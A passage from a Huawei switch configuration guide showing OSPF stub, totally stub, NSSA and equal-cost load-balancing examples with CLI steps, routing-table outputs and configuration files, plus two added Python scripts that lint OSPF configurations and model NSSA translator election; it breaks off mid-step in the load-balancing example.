[SwitchB-ospf-1] import-route static type 1 //SwitchB functions as an ASBR and imports external routes.
[SwitchB-ospf-1] quit

# Check the OSPF routing table on SwitchC. The command output shows that the OSPF
routing table contains an AS external route.
[SwitchC] display ospf routing

OSPF Process 1 with Router ID 10.3.3.3


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
192.168.0.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1

Routing for ASEs


Destination Cost Type Tag NextHop AdvRouter
10.0.0.0/8 3 Type1 1 192.168.1.1 10.2.2.2

Total Nets: 3
Intra Area: 1 Inter Area: 1 ASE: 1 NSSA: 0

Step 5 Configure Area 1 as a stub area.


# Configure SwitchA.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 1
[SwitchA-ospf-1-area-0.0.0.1] stub //Configure Area 1 as a stub area. All the routers in Area 1 must have the stub command configured.


[SwitchA-ospf-1-area-0.0.0.1] quit
[SwitchA-ospf-1] quit

# Configure SwitchC.
[SwitchC] ospf 1
[SwitchC-ospf-1] area 1
[SwitchC-ospf-1-area-0.0.0.1] stub //Configure Area 1 as a stub area. All the routers in Area 1 must have the stub command configured.
[SwitchC-ospf-1-area-0.0.0.1] quit
[SwitchC-ospf-1] quit

# Check the OSPF routing table on SwitchC. The command output shows that the OSPF
routing table does not contain any AS external route but contains a default route to external
networks.
[SwitchC] display ospf routing

OSPF Process 1 with Router ID 10.3.3.3


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
0.0.0.0/0 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1
192.168.0.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1

Total Nets: 3
Intra Area: 1 Inter Area: 2 ASE: 0 NSSA: 0

Step 6 Configure Area 1 as a totally stub area.


[SwitchA] ospf 1
[SwitchA-ospf-1] area 1
[SwitchA-ospf-1-area-0.0.0.1] stub no-summary //Configure Area 1 as a totally stub area. The ABR in Area 1 must have the stub no-summary command configured, while the other routers in Area 1 must have the stub command configured.
[SwitchA-ospf-1-area-0.0.0.1] quit
[SwitchA-ospf-1] quit

Step 7 Verify the configuration.


# Check the OSPF routing table on SwitchC. The command output shows that the OSPF
routing table now contains only an intra-area OSPF route and a default route to external networks.
The inter-area route 192.168.0.0/24 is no longer present, because the ABR no longer advertises
Type 3 LSAs into the totally stub area.
[SwitchC] display ospf routing

OSPF Process 1 with Router ID 10.3.3.3


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
0.0.0.0/0 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1

Total Nets: 2
Intra Area: 1 Inter Area: 1 ASE: 0 NSSA: 0

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20

#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.1.1.1
area 0.0.0.0
network 192.168.0.0 0.0.0.255
area 0.0.0.1
network 192.168.1.0 0.0.0.255
stub no-summary
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.0.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
ospf 1 router-id 10.2.2.2
import-route static type 1
area 0.0.0.0
network 192.168.0.0 0.0.0.255
#
ip route-static 10.0.0.0 255.0.0.0 NULL0
#
return

l Configuration file of SwitchC


#
sysname SwitchC
#
vlan batch 20
#
interface Vlanif20
ip address 192.168.1.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.3.3.3
area 0.0.0.1
network 192.168.1.0 0.0.0.255
stub
#
return


9.2.3 Example for Configuring an OSPF NSSA


Introduction to an NSSA
An NSSA is a special type of OSPF area. An NSSA is similar to a stub area in that neither of
them transmits routes learned from other areas in the AS in which they reside. The difference
between them is that an NSSA allows AS external routes to be imported and advertised in the
entire AS, whereas a stub area does not. To ensure the reachability of AS external routes, the
ABR in an NSSA generates a default route and advertises it to the other routers in the NSSA.

An NSSA allows Type 7 LSAs (NSSA External LSAs) to be advertised. Type 7 LSAs are
generated by the ASBR of the NSSA. When they reach the ABR of the NSSA, these LSAs can
be translated into Type 5 LSAs (AS External LSAs) and advertised to other areas.

Assume that a device of Company H connects to the backbone area through a single link. The
device has low performance and a small routing table. Engineers of this company want to
configure the area where the device resides as a stub area to reduce the routing table size and
system resource consumption of the device. In addition, AS external routes need to be
imported and advertised to the entire AS. A stub area cannot meet this requirement because
it does not allow received AS external routes to be advertised, so the area needs to be
configured as an NSSA.

Configuration Notes
l The backbone area cannot be configured as an NSSA.
l To configure an area as an NSSA, configure NSSA attributes on all the routers in this
area.
l A virtual link cannot pass through an NSSA.
l To reduce the number of LSAs that are transmitted to the NSSA, configure no-summary
on an ABR. This prevents the ABR from transmitting Type 3 LSAs to the NSSA,
making the area a totally NSSA.
l Table 9-3 lists applicable products and versions of this configuration example.

Table 9-3 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.
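The configuration notes of 9.2.1 (unique router IDs, every non-backbone area connected to the backbone), 9.2.2 (stub attributes on all routers, stub no-summary only on the ABR, no ASBR in a stub area) and this section (NSSA attributes on all routers, no NSSA backbone) are rules that are easy to violate when several switches are configured by hand. The following Python linter, added here and not part of the Huawei document, checks a set of VRP-style configuration files against those rules; the sample input is the OSPF stanzas of the stub-area configuration files in 9.2.2 plus a constructed faulty variant, and the function names are my own.

```python
"""Lint VRP-style configuration files against the OSPF configuration notes on
this page: unique router IDs, each non-backbone area attached to Area 0 by an
ABR, no stub/NSSA backbone, one stub/NSSA attribute per area, no-summary only
on an ABR, and no ASBR inside a stub area.  Added example, not Huawei code."""
from collections import defaultdict

BACKBONE = "0.0.0.0"


def parse_ospf(config_text):
    """Return sysname, router ID, {area: type} and ASBR flag for one config file."""
    info = {"sysname": None, "router_id": None, "areas": {}, "asbr": False}
    in_ospf, area = False, None
    for raw in config_text.splitlines():
        words = raw.split()
        if not words:
            continue
        if words[0] == "#":                       # stanza separator closes the ospf view
            in_ospf, area = False, None
        elif words[0] == "sysname":
            info["sysname"] = words[1]
        elif words[0] == "ospf" and len(words) > 1 and words[1].isdigit():
            in_ospf = True
            if "router-id" in words:
                info["router_id"] = words[words.index("router-id") + 1]
        elif in_ospf and words[0] == "import-route":
            info["asbr"] = True                   # importing routes makes this an ASBR
        elif in_ospf and words[0] == "area":
            area = words[1]                       # config files store the dotted form
            info["areas"].setdefault(area, "normal")
        elif in_ospf and area and words[0] in ("stub", "nssa"):
            prefix = "totally-" if "no-summary" in words else ""
            info["areas"][area] = prefix + words[0]
    return info


def lint_ospf(configs):
    """Apply the page's rules across all routers; return a list of findings."""
    routers = [parse_ospf(c) for c in configs]
    findings = []
    by_rid = defaultdict(list)
    for r in routers:
        by_rid[r["router_id"]].append(r["sysname"])
    for rid, names in by_rid.items():
        if len(names) > 1:
            findings.append(f"duplicate router ID {rid} on {', '.join(names)}")
    members = defaultdict(list)           # area -> [(name, type, is_abr, is_asbr)]
    for r in routers:
        is_abr = BACKBONE in r["areas"] and len(r["areas"]) > 1
        for a, kind in r["areas"].items():
            members[a].append((r["sysname"], kind, is_abr, r["asbr"]))
    for a, rows in members.items():
        kinds = {kind.replace("totally-", "") for _, kind, _, _ in rows}
        if a == BACKBONE:
            if kinds != {"normal"}:
                findings.append("backbone area 0.0.0.0 configured as stub/NSSA")
            continue
        if not any(is_abr for _, _, is_abr, _ in rows):
            findings.append(f"area {a} has no ABR connecting it to Area 0")
        if len(kinds) > 1:
            detail = ", ".join(f"{n}={k}" for n, k, _, _ in rows)
            findings.append(f"area {a} attribute mismatch: {detail}")
        for name, kind, is_abr, is_asbr in rows:
            if kind.startswith("totally-") and not is_abr:
                findings.append(f"{name}: no-summary in area {a} but not an ABR")
            if kind.endswith("stub") and is_asbr:
                findings.append(f"{name}: ASBR inside stub area {a}")
    return findings


# Sample input: OSPF stanzas of this page's stub-area configuration files (9.2.2).
SWITCH_A = """sysname SwitchA
ospf 1 router-id 10.1.1.1
 area 0.0.0.0
  network 192.168.0.0 0.0.0.255
 area 0.0.0.1
  network 192.168.1.0 0.0.0.255
  stub no-summary
#
"""
SWITCH_B = """sysname SwitchB
ospf 1 router-id 10.2.2.2
 import-route static type 1
 area 0.0.0.0
  network 192.168.0.0 0.0.0.255
#
"""
SWITCH_C = """sysname SwitchC
ospf 1 router-id 10.3.3.3
 area 0.0.0.1
  network 192.168.1.0 0.0.0.255
  stub
#
"""
# Constructed faulty variant: SwitchC reuses SwitchA's router ID and declares
# Area 1 an NSSA while its ABR (SwitchA) treats Area 1 as a stub area.
BAD_SWITCH_C = SWITCH_C.replace("10.3.3.3", "10.1.1.1").replace("  stub", "  nssa")
```

The first rule catches the duplicate router ID that the notes in 9.2.1 warn breaks neighbor establishment; the attribute mismatch catches the case where only some routers in Area 1 carry the stub or nssa command, which likewise prevents adjacency.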

Networking Requirements
As shown in Figure 9-8, SwitchA, SwitchB, SwitchC, and SwitchD run OSPF, and the OSPF
network is divided into Area 0 and Area 1. Devices in Area 1 must not receive external routes
imported from other areas, and must reach external networks only through the external routes
imported by the ASBR in Area 1. SwitchB transmits many services, so SwitchA needs to
translate Type 7 LSAs into Type 5 LSAs and send the LSAs to other OSPF areas.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 9-8 Networking diagram for OSPF NSSA configuration


[Figure: Area 1 (NSSA): SwitchD, ASBR (VLANIF30 192.168.3.2/24, VLANIF40 192.168.4.2/24); SwitchA (GE1/0/1, VLANIF30, 192.168.3.1/24; GE1/0/2, VLANIF10, 192.168.1.1/24); SwitchB (VLANIF40 192.168.4.1/24, VLANIF20 192.168.2.1/24). Area 0: SwitchC (VLANIF10 192.168.1.2/24, VLANIF20 192.168.2.2/24), connected to SwitchA and SwitchB.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure basic OSPF functions on each switch to implement interworking in the OSPF
network.
2. Configure Area 1 as an NSSA, configure a static route on SwitchD, and configure
SwitchD to import the static route into the OSPF routing table so that switches in Area 1
can communicate with external networks only through SwitchD.
3. Configure SwitchA as an LSA translator to translate Type 7 LSAs into Type 5 LSAs and
send the LSAs to other OSPF areas.

Procedure
Step 1 Specify the VLANs to which interfaces belong.
# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are similar to
the configuration of SwitchA, and are not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 30
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 30
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/2] quit

Step 2 Configure an IP address for each VLANIF interface.


# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are similar to
the configuration of SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 192.168.1.1 24
[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 30
[SwitchA-Vlanif30] ip address 192.168.3.1 24
[SwitchA-Vlanif30] quit

Step 3 Configure basic OSPF functions.


# Configure SwitchA.
[SwitchA] ospf 1 router-id 10.1.1.1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] area 1
[SwitchA-ospf-1-area-0.0.0.1] network 192.168.3.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.1] quit
[SwitchA-ospf-1] quit

# Configure SwitchB.
[SwitchB] ospf 1 router-id 10.2.2.2
[SwitchB-ospf-1] area 0
[SwitchB-ospf-1-area-0.0.0.0] network 192.168.2.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] quit
[SwitchB-ospf-1] area 1
[SwitchB-ospf-1-area-0.0.0.1] network 192.168.4.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.1] quit
[SwitchB-ospf-1] quit

# Configure SwitchC.
[SwitchC] ospf 1 router-id 10.3.3.3
[SwitchC-ospf-1] area 0
[SwitchC-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] network 192.168.2.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] quit
[SwitchC-ospf-1] quit

# Configure SwitchD.
[SwitchD] ospf 1 router-id 10.4.4.4
[SwitchD-ospf-1] area 1
[SwitchD-ospf-1-area-0.0.0.1] network 192.168.3.0 0.0.0.255
[SwitchD-ospf-1-area-0.0.0.1] network 192.168.4.0 0.0.0.255
[SwitchD-ospf-1-area-0.0.0.1] quit
[SwitchD-ospf-1] quit

Step 4 Configure Area 1 as an NSSA.


# Configure SwitchA.
[SwitchA] ospf 1
[SwitchA-ospf-1] area 1
[SwitchA-ospf-1-area-0.0.0.1] nssa //Configure Area 1 as an NSSA. All the
devices in Area 1 must have the nssa command configured.
[SwitchA-ospf-1-area-0.0.0.1] quit
[SwitchA-ospf-1] quit

# Configure SwitchB.
[SwitchB] ospf 1
[SwitchB-ospf-1] area 1
[SwitchB-ospf-1-area-0.0.0.1] nssa //Configure Area 1 as an NSSA. All the
devices in Area 1 must have the nssa command configured.
[SwitchB-ospf-1-area-0.0.0.1] quit
[SwitchB-ospf-1] quit

# Configure SwitchD.

[SwitchD] ospf 1
[SwitchD-ospf-1] area 1
[SwitchD-ospf-1-area-0.0.0.1] nssa //Configure Area 1 as an NSSA. All the
devices in Area 1 must have the nssa command configured.
[SwitchD-ospf-1-area-0.0.0.1] quit
[SwitchD-ospf-1] quit

Step 5 Configure SwitchD to import a static route.


[SwitchD] ip route-static 172.16.0.0 16 null 0
[SwitchD] ospf 1
[SwitchD-ospf-1] import-route static //Configure SwitchD to function as an ASBR
of the NSSA to import external routes.
[SwitchD-ospf-1] quit

# Check the OSPF routing table on SwitchC.


[SwitchC] display ospf routing

OSPF Process 1 with Router ID 10.3.3.3


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.0
192.168.2.0/24 1 Transit 192.168.2.2 10.3.3.3 0.0.0.0
192.168.3.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.0
192.168.4.0/24 2 Inter-area 192.168.2.1 10.2.2.2 0.0.0.0
Routing for ASEs
Destination Cost Type Tag NextHop AdvRouter
172.16.0.0/16 1 Type2 1 192.168.1.1 10.2.2.2

Total Nets: 5
Intra Area: 2 Inter Area: 2 ASE: 1 NSSA: 0

The command output shows that the AS external routes imported into the NSSA are
advertised by SwitchB to other areas. That is, SwitchB translates Type 7 LSAs into Type 5
LSAs. This is because OSPF selects the ABR with a larger router ID as an LSA translator.

Step 6 Configure SwitchA as an LSA translator.


[SwitchA] ospf 1
[SwitchA-ospf-1] area 1
[SwitchA-ospf-1-area-0.0.0.1] nssa translator-always
[SwitchA-ospf-1-area-0.0.0.1] quit
[SwitchA-ospf-1] quit

Step 7 Verify the configuration.

# Wait for 40 seconds and then check the OSPF routing table on SwitchC.
[SwitchC] display ospf routing

OSPF Process 1 with Router ID 10.3.3.3


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.0
192.168.2.0/24 1 Transit 192.168.2.2 10.3.3.3 0.0.0.0
192.168.3.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.0
192.168.4.0/24 2 Inter-area 192.168.2.1 10.2.2.2 0.0.0.0
Routing for ASEs
Destination Cost Type Tag NextHop AdvRouter
172.16.0.0/16 1 Type2 1 192.168.1.1 10.1.1.1

Total Nets: 5
Intra Area: 2 Inter Area: 2 ASE: 1 NSSA: 0

The command output shows that the AS external routes imported into the NSSA are
advertised by SwitchA to other areas. That is, SwitchA translates Type 7 LSAs into Type 5
LSAs.

NOTE

By default, the new LSA translator works with the previous LSA translator to translate LSAs for 40
seconds. After 40 seconds, only the new LSA translator translates LSAs.
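The translator election that Steps 5 and 6 rely on (the ABR with the larger router ID translates Type 7 LSAs unless one ABR is configured with nssa translator-always), modelled as added example code that is not part of the Huawei document. It also parses the "Routing for ASEs" section of display ospf routing output so that the advertising router of an external prefix can be checked against the expected translator. The class and function names are this example's own, and the sample output is constructed after the outputs shown above.

```python
"""Added example: NSSA translator election and a check of the ASE AdvRouter.

Not part of the Huawei document. Models the rule the text states: the ABR
configured with 'nssa translator-always' translates Type 7 LSAs; otherwise
the NSSA ABR with the larger router ID is elected. Class and function names
are this example's own assumptions.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, Tuple


@dataclass(frozen=True)
class NssaAbr:
    name: str
    router_id: str
    translator_always: bool = False  # 'nssa translator-always' configured


def elect_translator(abrs: Iterable[NssaAbr]) -> NssaAbr:
    """Return the ABR that translates Type 7 LSAs into Type 5 LSAs."""
    abrs = list(abrs)
    if not abrs:
        raise ValueError("no NSSA ABRs given")
    always = [a for a in abrs if a.translator_always]
    pool = always or abrs
    # Router IDs compare as 32-bit integers, not as dotted strings.
    return max(pool, key=lambda a: int(ipaddress.IPv4Address(a.router_id)))


def parse_ase_routes(output: str) -> Dict[str, str]:
    """Map each destination in the 'Routing for ASEs' section to its AdvRouter."""
    routes: Dict[str, str] = {}
    in_ase = False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith("Routing for ASEs"):
            in_ase = True
            continue
        if line.startswith("Total"):
            in_ase = False
        if not in_ase or not line or line.startswith("Destination"):
            continue
        fields = line.split()  # Destination Cost Type Tag NextHop AdvRouter
        if len(fields) >= 6 and "/" in fields[0]:
            routes[fields[0]] = fields[-1]
    return routes


def check_translator(output: str, prefix: str,
                     abrs: Iterable[NssaAbr]) -> Tuple[bool, str, str]:
    """(ok, advertising router seen, expected translator name) for one prefix."""
    seen = parse_ase_routes(output).get(prefix, "")
    expected = elect_translator(abrs)
    return seen == expected.router_id, seen, expected.name


# The two NSSA ABRs of the example; router IDs as configured in Step 3.
NSSA_ABRS = [NssaAbr("SwitchA", "10.1.1.1"), NssaAbr("SwitchB", "10.2.2.2")]
NSSA_ABRS_ALWAYS = [NssaAbr("SwitchA", "10.1.1.1", translator_always=True),
                    NssaAbr("SwitchB", "10.2.2.2")]

# Constructed sample shaped like the 'display ospf routing' output on SwitchC.
SAMPLE_BEFORE = """\
OSPF Process 1 with Router ID 10.3.3.3
Routing Tables

Routing for Network
Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.0
192.168.3.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.0
Routing for ASEs
Destination Cost Type Tag NextHop AdvRouter
172.16.0.0/16 1 Type2 1 192.168.1.1 10.2.2.2

Total Nets: 5
Intra Area: 2 Inter Area: 2 ASE: 1 NSSA: 0
"""
# After 'nssa translator-always' on SwitchA the AdvRouter becomes 10.1.1.1.
SAMPLE_AFTER = SAMPLE_BEFORE.replace("192.168.1.1 10.2.2.2", "192.168.1.1 10.1.1.1")

if __name__ == "__main__":
    print(check_translator(SAMPLE_BEFORE, "172.16.0.0/16", NSSA_ABRS))
    print(check_translator(SAMPLE_AFTER, "172.16.0.0/16", NSSA_ABRS_ALWAYS))
```

Running the module prints a tuple per sample; a False first element means the router advertising the external prefix is not the one the configuration says should be translating, which is the situation the 40-second overlap described in the NOTE can produce immediately after a change.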

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 30
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif30
ip address 192.168.3.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10
#
ospf 1 router-id 10.1.1.1
area 0.0.0.0
network 192.168.1.0 0.0.0.255
area 0.0.0.1
network 192.168.3.0 0.0.0.255
nssa translator-always
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 20 40
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 40
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.2.2.2
area 0.0.0.0
network 192.168.2.0 0.0.0.255
area 0.0.0.1
network 192.168.4.0 0.0.0.255
nssa
#
return

l Configuration file of SwitchC


#
sysname SwitchC
#
vlan batch 10 20
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.3.3.3
area 0.0.0.0
network 192.168.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
#
return

l Configuration file of SwitchD


#
sysname SwitchD
#
vlan batch 30 40
#
interface Vlanif30
ip address 192.168.3.2 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 40
#
ospf 1 router-id 10.4.4.4
import-route static
area 0.0.0.1
network 192.168.3.0 0.0.0.255
network 192.168.4.0 0.0.0.255
nssa
#
ip route-static 172.16.0.0 255.255.0.0 NULL0
#
return

9.2.4 Example for Configuring OSPF Load Balancing

OSPF Load Balancing Overview


Equal-cost multiple path (ECMP) evenly load balances traffic over multiple paths between two
network nodes. ECMP reduces the traffic load on each path and enhances network robustness. If a
routing protocol discovers multiple routes to the same destination and these routes have the
same cost, traffic can be load balanced among the routes. When load balancing is configured,
the router forwards packets according to five factors: the source address, destination address,
source port, destination port, and protocol in the packets. When the five factors are the same,
the router always sends the packets to the same next-hop address as the last time. When the
five factors are different, the router chooses the relatively idle path to forward packets.
On an OSPF network, multiple equal-cost paths sometimes exist between two network elements
(NEs), and a single path cannot carry all service traffic. Users require that all service
traffic be load balanced over multiple paths to improve network reliability and resource
usage. In this case, OSPF load balancing can be configured.

Configuration Notes
l The maximum number of equal-cost routes for load balancing can be configured using
the maximum load-balancing command.
l To cancel load balancing, you can set the maximum number of equal-cost routes to 1.
l Table 9-4 lists applicable products and versions of this configuration example.

Table 9-4 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 9-9, four switches all belong to Area0 on the OSPF network. Load
balancing needs to be configured so that the traffic from SwitchA is sent to SwitchD through
SwitchB and SwitchC.

NOTE

In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.

Figure 9-9 Networking diagram for configuring load balancing among OSPF routes
[Figure: all four switches are in Area 0. SwitchA: GE1/0/1 VLANIF10 10.1.1.1/24 to SwitchB,
GE1/0/2 VLANIF20 10.1.2.1/24 to SwitchC, GE1/0/3 VLANIF50 172.16.1.1/24. SwitchB: GE1/0/1
VLANIF10 10.1.1.2/24, GE1/0/2 VLANIF30 192.168.0.1/24 to SwitchD. SwitchC: GE1/0/1 VLANIF20
10.1.2.2/24, GE1/0/2 VLANIF40 192.168.1.1/24 to SwitchD. SwitchD: GE1/0/1 VLANIF30
192.168.0.2/24, GE1/0/2 VLANIF40 192.168.1.2/24, GE1/0/3 VLANIF60 172.17.1.1/24.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Configure basic OSPF functions on each switch to implement basic connections on the
OSPF network.
2. Configure load balancing on SwitchA.

Procedure
Step 1 Configure VLANs that each interface belongs to.

# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are the same as
the configuration of SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20 50
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 20
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type trunk
[SwitchA-GigabitEthernet1/0/3] port trunk allow-pass vlan 50
[SwitchA-GigabitEthernet1/0/3] quit

Step 2 Configure an IP address for each VLANIF interface.

# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are the same as
the configuration of SwitchA.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 10.1.1.1 24
[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 20
[SwitchA-Vlanif20] ip address 10.1.2.1 24
[SwitchA-Vlanif20] quit
[SwitchA] interface vlanif 50
[SwitchA-Vlanif50] ip address 172.16.1.1 24
[SwitchA-Vlanif50] quit

Step 3 Configure basic OSPF functions.

# Configure SwitchA.
[SwitchA] ospf 1 router-id 10.10.10.1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 172.16.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] quit

# Configure SwitchB.
[SwitchB] ospf 1 router-id 10.10.10.2
[SwitchB-ospf-1] area 0
[SwitchB-ospf-1-area-0.0.0.0] network 10.1.1.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] network 192.168.0.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] quit
[SwitchB-ospf-1] quit

# Configure SwitchC.
[SwitchC] ospf 1 router-id 10.10.10.3
[SwitchC-ospf-1] area 0
[SwitchC-ospf-1-area-0.0.0.0] network 10.1.2.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] quit
[SwitchC-ospf-1] quit

# Configure SwitchD.
[SwitchD] ospf 1 router-id 10.10.10.4
[SwitchD-ospf-1] area 0
[SwitchD-ospf-1-area-0.0.0.0] network 192.168.0.0 0.0.0.255
[SwitchD-ospf-1-area-0.0.0.0] network 192.168.1.0 0.0.0.255
[SwitchD-ospf-1-area-0.0.0.0] network 172.17.1.0 0.0.0.255
[SwitchD-ospf-1-area-0.0.0.0] quit
[SwitchD-ospf-1] quit

# Display the routing table of SwitchA.


[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 11 Routes : 12

Destination/Mask Proto Pre Cost Flags NextHop Interface

10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif10
10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.1.2.0/24 Direct 0 0 D 10.1.2.1 Vlanif20
10.1.2.1/32 Direct 0 0 D 127.0.0.1 Vlanif20
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
172.16.1.0/24 Direct 0 0 D 172.16.1.1 Vlanif50
172.16.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
172.17.1.0/24 OSPF 10 3 D 10.1.2.2 Vlanif20
OSPF 10 3 D 10.1.1.2 Vlanif10
192.168.0.0/24 OSPF 10 2 D 10.1.1.2 Vlanif10
192.168.1.0/24 OSPF 10 2 D 10.1.2.2 Vlanif20

As shown in the routing table, both next hops of SwitchA, 10.1.1.2 (SwitchB) and 10.1.2.2
(SwitchC), are installed as valid routes, because the maximum number of equal-cost routes is
16 for a modular switch and 8 for a fixed switch.

Step 4 Configure the weight of equal-cost routes on SwitchA.

If you do not want to implement load balancing between SwitchB and SwitchC, set the weight
of equal-cost routes to specify the next hop.
[SwitchA] ospf 1
[SwitchA-ospf-1] nexthop 10.1.2.2 weight 1 //Specify the weight parameter to
set the priority of equal-cost routes. The default weight value is 255. A larger
weight value indicates a lower priority.
[SwitchA-ospf-1] quit

# Check the routing table on SwitchA.


[SwitchA] display ip routing-table
